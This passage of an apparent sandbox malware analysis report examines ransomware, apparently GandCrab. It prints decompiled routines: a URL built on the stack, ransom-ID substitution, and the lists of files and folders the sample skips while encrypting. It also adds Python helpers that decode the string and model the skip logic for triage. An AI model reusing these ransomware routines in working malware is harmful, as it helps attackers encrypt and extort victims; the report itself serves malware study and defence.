                                        					_v192 = 0x65002d;
                                        					_v188 = 0x730061;
                                        					_v184 = 0x2e0079;
                                        					_v180 = 0x740068;
                                        					_v176 = 0x6c006d;
                                        					_v172 = 0x65002e;
                                        					_v168 = 0x6e;
                                        					if( *0xfc72a44 == 0) {
                                        						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        						 *0xfc72a44 = _t65;
                                        						if(_t65 != 0) {
                                        							wsprintfW(_t65, L"%s",  &_v280);
                                        						}
                                        					}
                                        					VirtualFree(_v160, 0, 0x8000);
                                        					_t54 = E0FC67C10( &_v152);
                                        					goto L24;
                                        				}
                                        				while(1) {
                                        					L11:
                                        					lstrcpyW(_t94, _t100);
                                        					_t94[lstrlenW(_t94)] = 0x20;
                                        					_t94 = 0xfc72000;
                                        					_t69 =  *0xfc72000; // 0xfeff
                                        					if(_t69 == 0) {
                                        						goto L20;
                                        					}
                                        					_t82 = _t69 & 0x0000ffff;
                                        					_t102 = 0xfc72000 - L"{USERID}";
                                        					do {
                                        						_t70 = L"{USERID}";
                                        						if(_t82 == 0) {
                                        							goto L19;
                                        						}
                                        						while(1) {
                                        							_t83 =  *_t70 & 0x0000ffff;
                                        							if(_t83 == 0) {
                                        								break;
                                        							}
                                        							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
                                        							if(_t90 != 0) {
                                        								L18:
                                        								if( *_t70 == 0) {
                                        									break;
                                        								}
                                        								goto L19;
                                        							}
                                        							_t70 =  &(_t70[1]);
                                        							if( *(_t102 + _t70) != _t90) {
                                        								continue;
                                        							}
                                        							goto L18;
                                        						}
                                        						_t100 = _v156;
                                        						goto L11;
                                        						L19:
                                        						_t20 =  &(_t94[1]); // 0x2d002d
                                        						_t82 =  *_t20 & 0x0000ffff;
                                        						_t94 =  &(_t94[1]);
                                        						_t102 = _t102 + 2;
                                        					} while (_t82 != 0);
                                        					goto L20;
                                        				}
                                        				goto L20;
                                        			}

                                        APIs
                                          • Part of subcall function 0FC639F0: GetProcessHeap.KERNEL32(?,?,0FC64637,00000000,?,00000000,00000000), ref: 0FC63A8C
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FC67357
                                          • Part of subcall function 0FC67330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FC67368
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FC67386
                                          • Part of subcall function 0FC67330: GetComputerNameW.KERNEL32 ref: 0FC67390
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC673B0
                                          • Part of subcall function 0FC67330: wsprintfW.USER32 ref: 0FC673F1
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC6740E
                                          • Part of subcall function 0FC67330: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FC67432
                                          • Part of subcall function 0FC67330: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FC64640,?), ref: 0FC67456
                                          • Part of subcall function 0FC67330: RegCloseKey.KERNEL32(00000000), ref: 0FC67472
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67192
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6719D
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671B3
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671BE
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671D4
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671DF
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671F5
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(0FC64966,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67200
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67216
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67221
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67237
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67242
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67261
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6726C
                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64151
                                        • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64193
                                        • lstrcpyW.KERNEL32 ref: 0FC64212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64219
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4100118565-2385900546
                                        • Opcode ID: 4e6d006cfc9124285203149be49a33b150eb4873ffa39b8f947a8d3aa0d3b9fb
                                        • Instruction ID: b5049ef12cc31d12215e7cdb4e2e75c3b1f9799232186eefce083f97b09ee241
                                        • Opcode Fuzzy Hash: 4e6d006cfc9124285203149be49a33b150eb4873ffa39b8f947a8d3aa0d3b9fb
                                        • Instruction Fuzzy Hash: B271F4B01083419BE724DF14C88B77A7BE1FF80758F50491CF6855B292EBB99648CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0FC641D6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
                                        				void* _t41;
                                        				void* _t44;
                                        				WCHAR* _t45;
                                        				signed short _t49;
                                        				signed short* _t50;
                                        				signed int _t55;
                                        				signed int _t56;
                                        				void* _t59;
                                        				WCHAR* _t60;
                                        				WCHAR* _t62;
                                        				void* _t65;
                                        
                                        				_t41 = __eax;
                                        				do {
                                        					 *(_t41 + 0xfc72000) =  *(_t41 + 0xfc72000) ^ 0x00000005;
                                        					_t41 = _t41 + 1;
                                        				} while (_t41 < 0xa38);
                                        				 *0xfc72a64 = 0xfc72000;
                                        				_t60 = E0FC68090(0xfc72000, L"{USERID}");
                                        				if(_t60 != 0) {
                                        					while(1) {
                                        						L4:
                                        						lstrcpyW(_t60, _t62);
                                        						_t60[lstrlenW(_t60)] = 0x20;
                                        						_t60 = 0xfc72000;
                                        						_t49 =  *0xfc72000; // 0xfeff
                                        						if(_t49 == 0) {
                                        							goto L13;
                                        						}
                                        						_t55 = _t49 & 0x0000ffff;
                                        						_t65 = 0xfc72000 - L"{USERID}";
                                        						do {
                                        							_t50 = L"{USERID}";
                                        							if(_t55 == 0) {
                                        								goto L12;
                                        							} else {
                                        								while(1) {
                                        									_t56 =  *_t50 & 0x0000ffff;
                                        									if(_t56 == 0) {
                                        										break;
                                        									}
                                        									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
                                        									if(_t59 != 0) {
                                        										L11:
                                        										if( *_t50 == 0) {
                                        											break;
                                        										} else {
                                        											goto L12;
                                        										}
                                        									} else {
                                        										_t50 =  &(_t50[1]);
                                        										if( *(_t65 + _t50) != _t59) {
                                        											continue;
                                        										} else {
                                        											goto L11;
                                        										}
                                        									}
                                        									goto L13;
                                        								}
                                        								_t62 = _a132;
                                        								goto L4;
                                        							}
                                        							goto L13;
                                        							L12:
                                        							_t7 =  &(_t60[1]); // 0x2d002d
                                        							_t55 =  *_t7 & 0x0000ffff;
                                        							_t60 =  &(_t60[1]);
                                        							_t65 = _t65 + 2;
                                        						} while (_t55 != 0);
                                        						goto L13;
                                        					}
                                        				}
                                        				L13:
                                        				_a8 = 0x740068;
                                        				_a12 = 0x700074;
                                        				_a16 = 0x3a0073;
                                        				_a20 = 0x2f002f;
                                        				_a24 = 0x770077;
                                        				_a28 = 0x2e0077;
                                        				_a32 = 0x6f0074;
                                        				_a36 = 0x700072;
                                        				_a40 = 0x6f0072;
                                        				_a44 = 0x65006a;
                                        				_a48 = 0x740063;
                                        				_a52 = 0x6f002e;
                                        				_a56 = 0x670072;
                                        				_a60 = 0x64002f;
                                        				_a64 = 0x77006f;
                                        				_a68 = 0x6c006e;
                                        				_a72 = 0x61006f;
                                        				_a76 = 0x2f0064;
                                        				_a80 = 0x6f0064;
                                        				_a84 = 0x6e0077;
                                        				_a88 = 0x6f006c;
                                        				_a92 = 0x640061;
                                        				_a96 = 0x65002d;
                                        				_a100 = 0x730061;
                                        				_a104 = 0x2e0079;
                                        				_a108 = 0x740068;
                                        				_a112 = 0x6c006d;
                                        				_a116 = 0x65002e;
                                        				_a120 = 0x6e;
                                        				if( *0xfc72a44 == 0) {
                                        					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        					 *0xfc72a44 = _t45;
                                        					if(_t45 != 0) {
                                        						wsprintfW(_t45, L"%s",  &_a8);
                                        					}
                                        				}
                                        				VirtualFree(_a128, 0, 0x8000);
                                        				_t44 = E0FC67C10( &_a136);
                                        				return _t44;
                                        			}

Instruction addresses (per-line address column, collapsed): 0x0fc641d6 to 0x0fc643ce

                                        APIs
                                        • lstrcpyW.KERNEL32 ref: 0FC64212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64219
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FC64385
                                        • wsprintfW.USER32 ref: 0FC6439F
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC643B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
• Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4033391921-3341315666
                                        • Opcode ID: 860c1f44c8c048dfad4ffba729c77a8e0276a970c7cdbab15483bc1ae32c4eca
                                        • Instruction ID: e5ff3fb85d33349a38ae571ea40675c0b1bff8aa0eafeeadc6f5247a3cc59a92
                                        • Opcode Fuzzy Hash: 860c1f44c8c048dfad4ffba729c77a8e0276a970c7cdbab15483bc1ae32c4eca
                                        • Instruction Fuzzy Hash: 0141ACB010C341CBD724DF00D48A36ABFE2FF81759F50491CE6880B292DBBA9589CF62
                                        Uniqueness

                                        Uniqueness Score: -1.00%
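The URL in the first function above is never stored as a string: it is assembled on the stack from 32-bit immediates (_a8 through _a120), two UTF-16LE code units per DWORD, which is why the "String ID" line for that function only lists single characters. The decoder below is an added example for this report, not code from the sample or from Joe Sandbox; it parses the `_aN = 0x...;` stores as the decompiler prints them, lays them out little-endian in offset order and decodes the result as UTF-16LE. The store lines embedded in it are copied from the function above; the generic gap check (stop at the first non-contiguous slot) is an assumption that suits other stack strings, not something the sample does.

```python
"""Decode a stack-built UTF-16 string from decompiler output.

Added example for this report; not code from the sample and not sandbox output.
"""
import re
import struct

# The store lines copied from the first decompiled function above.
DECOMPILED_STORES = """
_a8 = 0x740068;
_a12 = 0x700074;
_a16 = 0x3a0073;
_a20 = 0x2f002f;
_a24 = 0x770077;
_a28 = 0x2e0077;
_a32 = 0x6f0074;
_a36 = 0x700072;
_a40 = 0x6f0072;
_a44 = 0x65006a;
_a48 = 0x740063;
_a52 = 0x6f002e;
_a56 = 0x670072;
_a60 = 0x64002f;
_a64 = 0x77006f;
_a68 = 0x6c006e;
_a72 = 0x61006f;
_a76 = 0x2f0064;
_a80 = 0x6f0064;
_a84 = 0x6e0077;
_a88 = 0x6f006c;
_a92 = 0x640061;
_a96 = 0x65002d;
_a100 = 0x730061;
_a104 = 0x2e0079;
_a108 = 0x740068;
_a112 = 0x6c006d;
_a116 = 0x65002e;
_a120 = 0x6e;
"""

# One '_aN = 0x...;' store as printed by the decompiler.
STORE_RE = re.compile(r"_a(\d+)\s*=\s*0x([0-9a-fA-F]+)\s*;")


def parse_stack_stores(text):
    """Return [(stack_offset, dword_value)] for every store in text, sorted by offset.

    Sorting matters: the decompiler prints stores in program order, which is not
    guaranteed to be ascending stack-offset order.
    """
    return sorted((int(m.group(1)), int(m.group(2), 16)) for m in STORE_RE.finditer(text))


def decode_stack_wstring(stores, slot_size=4):
    """Lay the DWORDs out little-endian in offset order and decode as UTF-16LE.

    Stops at the first gap between slots (assumption: an uninitialised slot is not
    part of the string) and at the first NUL code unit, which is how lstrcpyW and
    wsprintfW would see the buffer.
    """
    buf = bytearray()
    next_offset = None
    for offset, value in stores:
        if next_offset is not None and offset != next_offset:
            break
        buf += struct.pack("<I", value)
        next_offset = offset + slot_size
    text = buf.decode("utf-16-le", errors="replace")
    nul = text.find("\x00")
    return text if nul < 0 else text[:nul]


def decode_from_decompiler(text):
    """Decompiler text in, recovered wide string out."""
    return decode_stack_wstring(parse_stack_stores(text))


if __name__ == "__main__":
    print(decode_from_decompiler(DECOMPILED_STORES))
```

The decoded string is the value the function then copies with wsprintfW into the 0x400-byte buffer it allocates and stores at 0xfc72a44; a strings-based scan of the file on disk sees only the per-character fragments listed under "String ID" above, which is why this kind of string only shows up in a memory dump.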

                                        C-Code - Quality: 93%
                                        			E0FC66790(WCHAR* __ecx) {
                                        				int _t4;
                                        				signed int _t5;
                                        				signed int _t15;
                                        				void* _t19;
                                        				WCHAR* _t21;
                                        				short* _t25;
                                        				WCHAR* _t26;
                                        
                                        				_t21 = __ecx;
                                        				_t4 = lstrlenW(__ecx);
                                        				_t5 = lstrlenW(_t21);
                                        				_t1 = _t21 - 2; // -2
                                        				_t25 = _t1 + _t5 * 2;
                                        				_t19 = _t4 - 1;
                                        				if(_t19 != 0) {
                                        					do {
                                        						_t25 = _t25 - 2;
                                        						_t19 = _t19 - 1;
                                        					} while ( *_t25 != 0x5c && _t19 != 0);
                                        				}
                                        				_t26 = _t25 + 2;
                                        				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
                                        					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
                                        						goto L5;
                                        					} else {
                                        						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
                                        						asm("sbb eax, eax");
                                        						return  ~_t15 + 1;
                                        					}
                                        				} else {
                                        					L5:
                                        					return 1;
                                        				}
                                        			}

Instruction addresses (per-line address column, collapsed): 0x0fc66799 to 0x0fc66840

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0FC669A3), ref: 0FC6679C
                                        • lstrlenW.KERNEL32(00000000), ref: 0FC667A1
                                        • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0FC667CD
                                        • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0FC667E2
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0FC667EE
                                        • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0FC667FA
                                        • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0FC66806
                                        • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0FC66812
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0FC6681E
                                        • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0FC6682A
                                        • lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 0FC66836
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
• Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi$lstrlen
                                        • String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                        • API String ID: 203586893-634406045
                                        • Opcode ID: 2c696bb5c9f3eaa4040f8bba95f3584df7eeaa61a0f6af41de8222a554fb7eba
                                        • Instruction ID: 656615464c6490533b688168c5bdcdeafe01c4c29269f3faf5039f3bab25e4cf
                                        • Opcode Fuzzy Hash: 2c696bb5c9f3eaa4040f8bba95f3584df7eeaa61a0f6af41de8222a554fb7eba
                                        • Instruction Fuzzy Hash: 5111A36220D73A255A202B79ECD3EEB15DD9D829A0B450539F500E6403EB85FB1297F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0FC66640(void* __ecx) {
                                        				void* _t10;
                                        				intOrPtr* _t21;
                                        				void* _t45;
                                        				void* _t46;
                                        
                                        				_t46 = __ecx;
                                        				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
                                        				if(E0FC68090(_t46, L"\\ProgramData\\") != 0 || E0FC68090(_t46, L"\\Program Files\\") != 0 || E0FC68090(_t46, L"\\Tor Browser\\") != 0 || E0FC68090(_t46, L"Ransomware") != 0 || E0FC68090(_t46, L"\\All Users\\") != 0 || E0FC68090(_t46, L"\\Local Settings\\") != 0) {
                                        					L16:
                                        					VirtualFree(_t45, 0, 0x8000);
                                        					return 0;
                                        				} else {
                                        					_t10 = E0FC68090(_t46, L":\\Windows\\");
                                        					if(_t10 != 0) {
                                        						goto L16;
                                        					} else {
                                        						_t21 = __imp__SHGetSpecialFolderPathW;
                                        						_push(_t10);
                                        						_push(0x2a);
                                        						_push(_t45);
                                        						_push(_t10);
                                        						if( *_t21() == 0 || E0FC68090(_t46, _t45) == 0) {
                                        							_push(0);
                                        							_push(0x2b);
                                        							_push(_t45);
                                        							_push(0);
                                        							if( *_t21() == 0 || E0FC68090(_t46, _t45) == 0) {
                                        								_push(0);
                                        								_push(0x24);
                                        								_push(_t45);
                                        								_push(0);
                                        								if( *_t21() == 0 || E0FC68090(_t46, _t45) == 0) {
                                        									_push(0);
                                        									_push(0x1c);
                                        									_push(_t45);
                                        									_push(0);
                                        									if( *_t21() == 0 || E0FC68090(_t46, _t45) == 0) {
                                        										VirtualFree(_t45, 0, 0x8000);
                                        										return 1;
                                        									} else {
                                        										goto L16;
                                        									}
                                        								} else {
                                        									goto L16;
                                        								}
                                        							} else {
                                        								goto L16;
                                        							}
                                        						} else {
                                        							goto L16;
                                        						}
                                        					}
                                        				}
                                        			}

Instruction addresses (per-line address column, collapsed): 0x0fc66651 to 0x0fc66780

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66653
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC666F2
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC6670C
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66726
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66740
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66760
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66775
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
• Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                        • String ID: :\Windows\$Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
                                        • API String ID: 1363212851-2358141795
                                        • Opcode ID: be80f8eb1945e0b54ec8d3f028c1476ee28414d88b79f5002d604f5fdc1461d5
                                        • Instruction ID: 867926f60501708de26d5a9695f2b06fd28b95ad1ce53ce6968f0067c0ab3be6
                                        • Opcode Fuzzy Hash: be80f8eb1945e0b54ec8d3f028c1476ee28414d88b79f5002d604f5fdc1461d5
                                        • Instruction Fuzzy Hash: 5B312E3034C71122FD6426761EE7B2F648A8FC0E52F504415EB01EE2C3FE99E9016399
                                        Uniqueness

                                        Uniqueness Score: -1.00%
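E0FC66790 and E0FC66640 above are the two skip checks the sample applies to a candidate path: the first scans backwards for the last backslash and compares the base name case-insensitively against a short list that includes its own ransom note, GDCB-DECRYPT.txt; the second rejects any path containing one of seven substrings and then, via SHGetSpecialFolderPathW, any path under CSIDL 0x2a, 0x2b, 0x24 or 0x1c (CSIDL_PROGRAM_FILESX86, CSIDL_PROGRAM_FILES_COMMON, CSIDL_WINDOWS and CSIDL_LOCAL_APPDATA). The Python below is an added model of both checks for triage, not code from the sample or the report. It assumes E0FC68090 is a plain substring search (an inference from how its return value is used above; whether it folds case is not visible in the decompiled output), and it substitutes fixed folder paths for the four SHGetSpecialFolderPathW results so it runs offline. The sample paths at the bottom are constructed.

```python
"""Model of the sample's path skip checks (E0FC66640 and E0FC66790 above).

Added example for this report; not code from the sample and not sandbox output.
"""

# Substrings rejected by E0FC66640 before any special-folder lookup.
SKIP_SUBSTRINGS = [
    "\\ProgramData\\", "\\Program Files\\", "\\Tor Browser\\", "Ransomware",
    "\\All Users\\", "\\Local Settings\\", ":\\Windows\\",
]

# The four CSIDL values E0FC66640 passes to SHGetSpecialFolderPathW, with
# assumed resolutions so the check runs without calling the shell API.
SPECIAL_FOLDERS = {
    0x2a: "C:\\Program Files (x86)",          # CSIDL_PROGRAM_FILESX86
    0x2b: "C:\\Program Files\\Common Files",  # CSIDL_PROGRAM_FILES_COMMON
    0x24: "C:\\Windows",                      # CSIDL_WINDOWS
    0x1c: "C:\\Users\\user\\AppData\\Local",  # CSIDL_LOCAL_APPDATA (assumed user)
}

# Base names E0FC66790 compares with lstrcmpiW (case-insensitive).
SKIP_FILENAMES = {
    "desktop.ini", "autorun.inf", "ntuser.dat", "iconcache.db",
    "bootsect.bak", "boot.ini", "ntuser.dat.log", "thumbs.db",
    "GDCB-DECRYPT.txt",
}


def sample_basename(path):
    """Replicate the backward scan in E0FC66790.

    The sample starts at the last character and steps back one position at a
    time until it reads a backslash or runs out of characters, then takes the
    name as everything after the stop position. The last character itself is
    never tested and a path with no backslash yields path[1:], exactly as the
    decompiled loop does.
    """
    i = len(path) - 1
    remaining = len(path) - 1
    if remaining != 0:
        while True:
            i -= 1
            remaining -= 1
            if path[i] == "\\" or remaining == 0:
                break
    return path[i + 1:]


def filename_skipped(path):
    """E0FC66790: True when the base name is on the skip list."""
    return sample_basename(path).lower() in {n.lower() for n in SKIP_FILENAMES}


def directory_allowed(path):
    """E0FC66640: False when a blacklisted substring or special folder is in the path."""
    if any(s in path for s in SKIP_SUBSTRINGS):
        return False
    for csidl in (0x2a, 0x2b, 0x24, 0x1c):
        folder = SPECIAL_FOLDERS.get(csidl)
        # A failed SHGetSpecialFolderPathW lookup simply moves on to the next CSIDL.
        if folder and folder in path:
            return False
    return True


def would_be_skipped(path):
    """Combined result: the sample leaves the file alone if either check fires."""
    return (not directory_allowed(path)) or filename_skipped(path)


# Constructed sample paths, not taken from the analysis.
SAMPLE_PATHS = [
    "C:\\Windows\\System32\\drivers\\etc\\hosts",
    "C:\\Program Files (x86)\\Vendor\\app.dll",
    "C:\\Users\\user\\Desktop\\GDCB-DECRYPT.txt",
    "C:\\Users\\user\\Desktop\\Thumbs.db",
    "C:\\Users\\user\\Documents\\report.docx",
]


def triage(paths):
    """Map each path to True (skipped by the sample) or False (would be processed)."""
    return {p: would_be_skipped(p) for p in paths}


if __name__ == "__main__":
    for path, skipped in triage(SAMPLE_PATHS).items():
        print("skip   " if skipped else "process", path)
```

Note that "\\Program Files\\" does not match "C:\\Program Files (x86)\\...", which is why the sample queries CSIDL 0x2a separately; the model shows the same gap if the special-folder table is emptied.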

                                        C-Code - Quality: 93%
                                        			E0FC67140(intOrPtr* __ecx) {
                                        				int _t42;
                                        				int _t48;
                                        				int _t51;
                                        				int _t54;
                                        				int _t57;
                                        				int _t60;
                                        				int _t63;
                                        				int _t66;
                                        				int _t70;
                                        				int _t72;
                                        				void* _t75;
                                        				intOrPtr* _t86;
                                        				int _t88;
                                        				int _t89;
                                        				int _t90;
                                        				int _t91;
                                        				int _t92;
                                        				int _t93;
                                        				int _t94;
                                        				void* _t95;
                                        
                                        				_t40 = lstrlenW;
                                        				_t86 = __ecx;
                                        				_t75 = 0;
                                        				if( *__ecx != 0) {
                                        					_t72 = lstrlenW( *(__ecx + 8));
                                        					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
                                        					_t40 = lstrlenW;
                                        					_t75 = _t3 + _t72;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
                                        					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
                                        					_t70 = lstrlenW( *(_t86 + 0x10));
                                        					_t7 = _t95 + 4; // 0x4
                                        					_t75 = _t7 + _t70 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
                                        					_t94 = lstrlenW( *(_t86 + 0x20));
                                        					_t66 = lstrlenW( *(_t86 + 0x1c));
                                        					_t11 = _t94 + 4; // 0x4
                                        					_t75 = _t11 + _t66 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
                                        					_t93 = lstrlenW( *(_t86 + 0x2c));
                                        					_t63 = lstrlenW( *(_t86 + 0x28));
